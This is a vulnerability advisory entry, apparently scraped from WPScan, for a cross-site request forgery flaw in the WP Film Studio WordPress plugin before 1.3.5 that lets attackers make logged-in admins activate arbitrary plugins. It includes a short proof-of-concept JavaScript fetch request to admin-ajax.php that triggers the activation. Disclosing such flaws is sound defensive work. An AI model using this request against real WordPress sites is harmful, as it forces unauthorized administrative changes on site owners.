Lucene search

K
wpvulndbLana CodesWPVDB-ID:95A6A11E-DA5D-4FAC-AFF6-A3F7624682B7
HistoryFeb 28, 2023 - 12:00 a.m.

WP Film Studio < 1.3.5 - Arbitrary Plugin Activation via CSRF

2023-02-2800:00:00
Lana Codes
wpscan.com
6
wordpress
plugin
csrf
activation

0.001 Low

EPSS

Percentile

29.9%

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

PoC

activate woocommerce plugin exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=wpfilm-studio_ajax_plugin_activation&location;=woocommerce/woocommerce.php’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));

CPENameOperatorVersion
wp-film-studiolt1.3.5

0.001 Low

EPSS

Percentile

29.9%

Related for WPVDB-ID:95A6A11E-DA5D-4FAC-AFF6-A3F7624682B7